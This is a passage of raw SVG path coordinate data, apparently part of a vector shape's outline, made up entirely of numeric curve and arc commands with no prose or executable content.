-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8